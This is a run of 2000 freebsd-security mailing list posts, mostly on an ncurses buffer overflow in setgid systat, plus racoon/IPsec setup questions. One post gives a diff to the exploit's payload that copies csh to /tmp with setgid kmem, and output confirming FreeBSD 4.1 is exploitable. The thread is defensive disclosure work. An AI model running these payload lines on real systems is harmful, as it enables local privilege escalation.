(NOVST) Message-ID: <39E32CB4.651CAE3F@sentry.granch.ru> Date: Tue, 10 Oct 2000 21:50:28 +0700 From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: Przemyslaw Frasunek Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> <20001010160736.N94343@riget.scene.pl> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Przemyslaw Frasunek wrote: > > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > > For those of you who don't subscribe to BUGTRAQ, here's a heads up. > > And the exploit (in attachment). > Press any key to continue...sentry:[shelton] 150>sh systat.sh setenv: not found systat.sh: 69: Syntax error: Bad fd number Press any key to continue... -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Brainbench ID: 28514 Granch Ltd. lead engineer, e-mail: achilov@granch.ru tel/fax (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 9: 2:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bongo.rbc.ru (bongo.rbc.ru [195.218.138.120]) by hub.freebsd.org (Postfix) with ESMTP id ED59D37B66D for ; Tue, 10 Oct 2000 09:02:20 -0700 (PDT) Received: from bingo.rbc.ru (bingo.rbc.ru [195.218.138.28]) by bongo.rbc.ru (Postfix) with ESMTP id DD2A614FB4 for ; Tue, 10 Oct 2000 20:02:15 +0400 (MSD) Received: from igor ([195.218.167.26]) by bingo.rbc.ru (8.9.3/8.9.3) with SMTP id UAA12878 for ; Tue, 10 Oct 2000 20:02:15 +0400 (MSD) (envelope-from igorp@mail.rbc.ru) Message-ID: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> From: "Igor" To: Subject: racoon problem Date: Tue, 10 Oct 2000 20:03:21 +0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00B0_01C032F5.23DD5CE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Disposition-Notification-To: "Igor" X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_00B0_01C032F5.23DD5CE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable i configure ipsec and racoon=20 #ipsec.conf=20 spdadd 1.1.1.1 2.2.2.2 any -P out ipsec esp/transport/1.1.1.1-2.2.2.2/require ; spdadd 2.2.2.2 1.1.1.1 any -P in ipsec esp/transport/2.2.2.2-1.1.1.1/require ; setkey -f ipsec.conf =20 #racoon.conf path pre_shared_key "psk" ; log debug4; remote anonymous { exchange_mode aggressive,main,base; identifier address; proposal_check obey; lifetime time 24 hour ; # sec,min,hour lifetime byte 100 MB ; # B,KB,GB # phase 1 proposal (for ISAKMP SA) proposal { encryption_algorithm des ; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2; } } # phase 2 proposal (for IPsec SA) sainfo anonymous { pfs_group 2; lifetime time 12 hour ; lifetime byte 50 MB ; encryption_algorithm des ; authentication_algorithm hmac_md5, hmac_sha1 ; compression_algorithm deflate ; } =20 racoon -f racoon.conf #psk 1.1.1.1 12345678 2.2.2.2 12345678 =20 on phase 2 00-10-04 16:22:05: pfkey.c:193:pfkey_handler(): get pfkey ADD message 2000-10-04 16:22:05: pfkey.c:209:pfkey_handler(): pfkey ADD failed = Invalid argument =20 I think the password for crypt packets at this time is must be = established what is wrong ? =20 =20 =20 ------=_NextPart_000_00B0_01C032F5.23DD5CE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
i configure ipsec and racoon =
 
#ipsec.conf
spdadd 1.1.1.1 2.2.2.2 any -P out=20 ipsec
       =20 esp/transport/1.1.1.1-2.2.2.2/require ;
spdadd 2.2.2.2 1.1.1.1 any -P = in=20 ipsec
       =20 esp/transport/2.2.2.2-1.1.1.1/require ;
 
setkey -f ipsec.conf
 
 
#racoon.conf
path pre_shared_key "psk" = ;
log debug4;
remote=20 anonymous
{
        = exchange_mode=20 aggressive,main,base;
       =20 identifier address;
        proposal_check=20 obey;
        lifetime time 24 = hour ; #=20 sec,min,hour
        lifetime byte = 100 MB=20 ;  # B,KB,GB
        # phase=20 1 proposal (for ISAKMP SA)
        = proposal=20 {
           &n= bsp;   =20 encryption_algorithm des=20 ;
           &n= bsp;   =20 hash_algorithm=20 sha1;
          &nbs= p;    =20 authentication_method pre_shared_key=20 ;
           &n= bsp;   =20 dh_group 2;
        = }
}
# phase 2 proposal (for IPsec = SA)
sainfo=20 anonymous
{
        pfs_group=20 2;
        lifetime time 12 hour=20 ;
        lifetime byte 50 MB=20 ;
        encryption_algorithm des = ;
        authentication_algorithm = hmac_md5, hmac_sha1 ;
       =20 compression_algorithm deflate ;
}
 
racoon -f racoon.conf
#psk
1.1.1.1     =     =20 12345678
2.2.2.2         &nb= sp;12345678
 
 
on phase 2
00-10-04 16:22:05: = pfkey.c:193:pfkey_handler(): get=20 pfkey ADD message
2000-10-04 16:22:05: pfkey.c:209:pfkey_handler(): = pfkey ADD=20 failed Invalid argument
 
I think the password for crypt packets = at this time=20 is must be established
what is wrong ?
 
 
 
------=_NextPart_000_00B0_01C032F5.23DD5CE0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 11: 5:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from femail1.sdc1.sfba.home.com (femail1.sdc1.sfba.home.com [24.0.95.81]) by hub.freebsd.org (Postfix) with ESMTP id 7534A37B66D for ; Tue, 10 Oct 2000 11:05:13 -0700 (PDT) Received: from mthompson.home.net ([24.7.95.143]) by femail1.sdc1.sfba.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001010180500.EDDL6495.femail1.sdc1.sfba.home.com@mthompson.home.net> for ; Tue, 10 Oct 2000 11:05:00 -0700 Message-Id: <4.3.2.7.2.20001010110133.00cf6b60@mail.smateo1.sfba.home.com> X-Sender: mpthompson@mail.smateo1.sfba.home.com X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 10 Oct 2000 11:01:48 -0700 To: freebsd-security@freebsd.org From: Mike Thompson Subject: Re: Encrypted IP tunneling solution Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, no URL yet. I'll put the code up on a server and send the URL out=20 later this week. I just wanted to gauge the interest and it seems that=20 there is at least some mild interest in the code. Mike At 02:04 PM 10/9/00 -0700, Mikko Tyolajarvi wrote: >Hi, > >I wouldn't mind having a look, as I need something like this to access >my home machine from my laptop (among other things). > >But I see no URL :-) > > Regards, > /Mikko > >In local.freebsd-security you write: > > >I've created a fairly simple little application called stun that > >[...] > > >If you are interested, let me know. I'm more than happy to share it, but= I > >[...] > > >where a virtual NDIS VxD driver or some similar beast will have to be > >Yuk! >-- > Mikko= Ty=F6l=E4j=E4rvi_______________________________________mikko@rsasecurity.co= m > RSA Security To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 16:58:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 930BC37B66C for ; Tue, 10 Oct 2000 16:58:29 -0700 (PDT) Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id QAA10133; Tue, 10 Oct 2000 16:58:28 -0700 (PDT) Received: by grok.example.net (Postfix, from userid 1000) id BCAFD21316E; Tue, 10 Oct 2000 16:59:08 -0700 (PDT) Date: Tue, 10 Oct 2000 16:59:08 -0700 From: Steve Reid To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010165908.C9112@grok> References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <200010101403.e9AE3Ir08713@cwsys.cwsent.com>; from Cy Schubert - ITSD Open Systems Group on Tue, Oct 10, 2000 at 07:02:30AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > For those of you who don't subscribe to BUGTRAQ, here's a heads up. I tried it on a 4.1-R box and a 4.1.1-R box, with the same results both times: steve@grok:/home/steve% ./exploit.csh -rwxr-sr-x 1 steve wheel 622908 Oct 10 16:47 /tmp/csh So there is arbitrary code being executed to copy csh to /tmp and set it setguid, but I am in group wheel already, so no gain (it should be group kmem). Either systat gives up privs before the Bad Stuff happens, or the exploit is just a proof-of-concept designed to not work for script kiddies. What about top? It is linked to ncurses too. I tried changing the script to use top instead of systat but got this: steve@grok:/home/steve% ./exploit.csh ls: /tmp/csh: No such file or directory So either top is not exploitable or the exploit needs to be modified for top. I would `chmod g-s /usr/bin/systat /usr/bin/top` until we know for sure. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17: 2:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 50DE137B66D for ; Tue, 10 Oct 2000 17:02:19 -0700 (PDT) Received: (qmail 28267 invoked by uid 1001); 11 Oct 2000 00:02:34 -0000 Date: Wed, 11 Oct 2000 03:02:34 +0300 From: Peter Pentchev To: achilov@granch.ru Cc: Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001011030234.B28063@ringwraith.office1.bg> References: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> <20001010160736.N94343@riget.scene.pl> <39E32CB4.651CAE3F@sentry.granch.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39E32CB4.651CAE3F@sentry.granch.ru>; from shelton@sentry.granch.ru on Tue, Oct 10, 2000 at 09:50:28PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 09:50:28PM +0700, Rashid N. Achilov wrote: > Przemyslaw Frasunek wrote: > > > > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > > > For those of you who don't subscribe to BUGTRAQ, here's a heads up. > > > > And the exploit (in attachment). > > > > Press any key to continue...sentry:[shelton] 150>sh systat.sh > setenv: not found > systat.sh: 69: Syntax error: Bad fd number > Press any key to continue... Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running it with 'sh'? G'luck, Peter -- No language can express every thought unambiguously, least of all this one. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17: 7:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 7F96537B66D for ; Tue, 10 Oct 2000 17:07:35 -0700 (PDT) Received: (qmail 4275 invoked by uid 1000); 11 Oct 2000 00:11:01 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 00:11:01 -0000 Date: Tue, 10 Oct 2000 19:11:01 -0500 (CDT) From: Mike Silbersack To: Steve Reid Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: <20001010165908.C9112@grok> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Steve Reid wrote: > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > > For those of you who don't subscribe to BUGTRAQ, here's a heads up. > > I tried it on a 4.1-R box and a 4.1.1-R box, with the same results both > times: > > steve@grok:/home/steve% ./exploit.csh > -rwxr-sr-x 1 steve wheel 622908 Oct 10 16:47 /tmp/csh > > So there is arbitrary code being executed to copy csh to /tmp and set > it setguid, but I am in group wheel already, so no gain (it should be > group kmem). Either systat gives up privs before the Bad Stuff happens, > or the exploit is just a proof-of-concept designed to not work for > script kiddies. Well, the advisory states that ncurses 5.0 and before are vulnerable. It looks like 5.1-prerelease is what 4.1+ are using. So, until we here more from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is safe. (The exploit didn't work for me either, FWIW.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17:10:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 586FF37B66C for ; Tue, 10 Oct 2000 17:10:07 -0700 (PDT) Received: (qmail 4285 invoked by uid 1000); 11 Oct 2000 00:13:34 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 00:13:34 -0000 Date: Tue, 10 Oct 2000 19:13:33 -0500 (CDT) From: Mike Silbersack To: Steve Reid Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Mike Silbersack wrote: > Well, the advisory states that ncurses 5.0 and before are vulnerable. It > looks like 5.1-prerelease is what 4.1+ are using. So, until we here more > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is > safe. > > (The exploit didn't work for me either, FWIW.) > > Mike "Silby" Silbersack I partially retract that. It looks like 3.x doesn't use ncurses, if I'm reading cvs properly. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17:38:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 64E7837B502; Tue, 10 Oct 2000 17:38:28 -0700 (PDT) Received: from localhost (8nurpp@localhost [127.0.0.1] (may be forged)) by green.dyndns.org (8.11.0/8.11.0) with ESMTP id e9B0cH562984; Tue, 10 Oct 2000 20:38:20 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200010110038.e9B0cH562984@green.dyndns.org> X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 To: Peter Pentchev Cc: achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: Message from Peter Pentchev of "Wed, 11 Oct 2000 03:02:34 +0300." <20001011030234.B28063@ringwraith.office1.bg> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 10 Oct 2000 20:38:16 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Pentchev wrote: > On Tue, Oct 10, 2000 at 09:50:28PM +0700, Rashid N. Achilov wrote: > > Przemyslaw Frasunek wrote: > > > > > > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > > > > For those of you who don't subscribe to BUGTRAQ, here's a heads up. > > > > > > And the exploit (in attachment). > > > > > > > Press any key to continue...sentry:[shelton] 150>sh systat.sh > > setenv: not found > > systat.sh: 69: Syntax error: Bad fd number > > Press any key to continue... > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running > it with 'sh'? The canonical lazy person's execution method for scripts is "shell script.shell", because it is easier than "chmod +x script.shell; ./ script.shell". C shell scripts are supposed to be named .csh for consistency, or nothing at all. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17:49:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 08DF537B502 for ; Tue, 10 Oct 2000 17:49:35 -0700 (PDT) Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11142; Tue, 10 Oct 2000 17:49:33 -0700 (PDT) Received: by grok.example.net (Postfix, from userid 1000) id 4A4F621316E; Tue, 10 Oct 2000 17:50:13 -0700 (PDT) Date: Tue, 10 Oct 2000 17:50:13 -0700 From: Steve Reid To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010175013.D9112@grok> References: <20001010165908.C9112@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: ; from Mike Silbersack on Tue, Oct 10, 2000 at 07:11:01PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 07:11:01PM -0500, Mike Silbersack wrote: > Well, the advisory states that ncurses 5.0 and before are vulnerable. It > looks like 5.1-prerelease is what 4.1+ are using. So, until we here more > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is > safe. The exploit just needs slight modification: --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 @@ -11,7 +11,7 @@ #!/bin/csh cp /bin/csh /tmp -/usr/sbin/chown venglin.kmem /tmp/csh +chgrp kmem /tmp/csh chmod 2755 /tmp/csh __EOF__ 4.1-R _is_ exploitable: steve@grok:/home/steve% ./exploit.csh -rwxr-sr-x 1 steve kmem 622908 Oct 10 17:48 /tmp/csh steve@grok:/home/steve% uname -srm FreeBSD 4.1-RELEASE i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17:58: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 053BD37B66C for ; Tue, 10 Oct 2000 17:57:59 -0700 (PDT) Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11312; Tue, 10 Oct 2000 17:57:55 -0700 (PDT) Received: by grok.example.net (Postfix, from userid 1000) id 9690F21316E; Tue, 10 Oct 2000 17:58:35 -0700 (PDT) Date: Tue, 10 Oct 2000 17:58:35 -0700 From: Steve Reid To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010175835.E9112@grok> References: <20001010165908.C9112@grok> <20001010175013.D9112@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote: > --- exploit.csh.orig Tue Oct 10 17:42:49 2000 +++ exploit.csh Tue Oct 10 17:46:53 2000 > @@ -11,7 +11,7 @@ > #!/bin/csh > > cp /bin/csh /tmp > -/usr/sbin/chown venglin.kmem /tmp/csh > +chgrp kmem /tmp/csh > chmod 2755 /tmp/csh > __EOF__ BTW, the above is relative to the exploit Przemyslaw Frasunek posted to bugtraq. The one he posted to freebsd-security, the line was: /usr/sbin/chgrp kmem /tmp/csh Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin. This just goes to show, that just because an exploit script doesn't work for you, doesn't mean that you are not vulnerable. Assume the worst! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 18:13:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id EDCCE37B671 for ; Tue, 10 Oct 2000 18:13:01 -0700 (PDT) Received: (qmail 12618 invoked from network); 11 Oct 2000 01:12:54 -0000 Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 11 Oct 2000 01:12:54 -0000 Message-ID: <39E3C11D.6BB4D06F@eSec.com.au> Date: Wed, 11 Oct 2000 12:23:41 +1100 From: Sam Wun Organization: eSec X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@freebsd.org, comp.unix.bsd.openbsd.misc@eSec.com.au Subject: Connect Ipsec between openbsd and freebsd References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I want to connect ipsec from openbsd to a freebsd box thru some tunnels. I know how to setup ipsec in freebsd by recomipling the kernel and using spdadd to define policies with setkey. It works fine between freebsd boxes. But not sure how to connect it to other different systems, for example, openBSD. In openBSD, isakmpd is used for setting ipsec. I konw we can use certificate with isakmpd in OpenBSD. What about in FreeBSD? What should this 2 systems comproised before the ipsec tunnel can be established between them? Thanks Sam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 18:17:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id A28C337B66D for ; Tue, 10 Oct 2000 18:17:23 -0700 (PDT) Received: (qmail 4642 invoked by uid 1000); 11 Oct 2000 01:20:49 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 01:20:49 -0000 Date: Tue, 10 Oct 2000 20:20:49 -0500 (CDT) From: Mike Silbersack To: Steve Reid Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: <20001010175835.E9112@grok> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Steve Reid wrote: > BTW, the above is relative to the exploit Przemyslaw Frasunek posted to > bugtraq. The one he posted to freebsd-security, the line was: > > /usr/sbin/chgrp kmem /tmp/csh > > Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin. > > This just goes to show, that just because an exploit script doesn't > work for you, doesn't mean that you are not vulnerable. Assume the > worst! Damn, it works now. Thanks for the heads up. (I can't actually get /tmp/csh to execute, but that seems unimportant at this point.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 18:55:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 1BF2637B503 for ; Tue, 10 Oct 2000 18:55:23 -0700 (PDT) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id e9B1tF609930; Tue, 10 Oct 2000 21:55:15 -0400 (EDT) Date: Tue, 10 Oct 2000 21:55:15 -0400 (EDT) From: Trevor Johnson To: Mike Silbersack Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Well, the advisory states that ncurses 5.0 and before are vulnerable. It > looks like 5.1-prerelease is what 4.1+ are using. So, until we here more > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is > safe. The fixes were applied in ncurses-20001007. We have ncurses-20000701. I'm attempting to prepare ncurses-20001009 for importing: http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter Wemm. It needs more testing though (I haven't even done a "make world"). -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 19: 3:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1DCA637B502 for ; Tue, 10 Oct 2000 19:03:09 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05046; Tue, 10 Oct 2000 19:03:28 -0700 (PDT) Date: Tue, 10 Oct 2000 19:03:28 -0700 From: Kris Kennaway To: Sam Wun Cc: freebsd-security@FreeBSD.ORG, comp.unix.bsd.openbsd.misc@eSec.com.au Subject: Re: Connect Ipsec between openbsd and freebsd Message-ID: <20001010190328.A5034@citusc17.usc.edu> References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> <39E3C11D.6BB4D06F@eSec.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39E3C11D.6BB4D06F@eSec.com.au>; from swun@eSec.com.au on Wed, Oct 11, 2000 at 12:23:41PM +1100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 11, 2000 at 12:23:41PM +1100, Sam Wun wrote: > I want to connect ipsec from openbsd to a freebsd box thru some tunnels. > I know how to setup ipsec in freebsd by recomipling the kernel and using > spdadd to define policies with setkey. It works fine between freebsd > boxes. But not sure how to connect it to other different systems, for > example, openBSD. > In openBSD, isakmpd is used for setting ipsec. I konw we can use > certificate with isakmpd in OpenBSD. What about in FreeBSD? What should > this 2 systems comproised before the ipsec tunnel can be established > between them? Use the racoon port. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 19: 4:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3AA1637B502; Tue, 10 Oct 2000 19:04:56 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05060; Tue, 10 Oct 2000 19:05:17 -0700 (PDT) Date: Tue, 10 Oct 2000 19:05:17 -0700 From: Kris Kennaway To: Trevor Johnson Cc: Mike Silbersack , freebsd-security@FreeBSD.ORG, peter@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010190517.B5034@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from trevor@jpj.net on Tue, Oct 10, 2000 at 09:55:15PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 09:55:15PM -0400, Trevor Johnson wrote: > > Well, the advisory states that ncurses 5.0 and before are vulnerable. It > > looks like 5.1-prerelease is what 4.1+ are using. So, until we here more > > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is > > safe. > > The fixes were applied in ncurses-20001007. We have ncurses-20000701. > > I'm attempting to prepare ncurses-20001009 for importing: > http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter > Wemm. It needs more testing though (I haven't even done a "make world"). I believe Peter was also looking at this - I think he was basically ready to commit. Thanks for taking a look at it, though. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 19: 6:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id BBB8737B503 for ; Tue, 10 Oct 2000 19:06:06 -0700 (PDT) Received: (qmail 4784 invoked by uid 1000); 11 Oct 2000 02:09:33 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 02:09:33 -0000 Date: Tue, 10 Oct 2000 21:09:33 -0500 (CDT) From: Mike Silbersack To: Trevor Johnson Cc: freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: 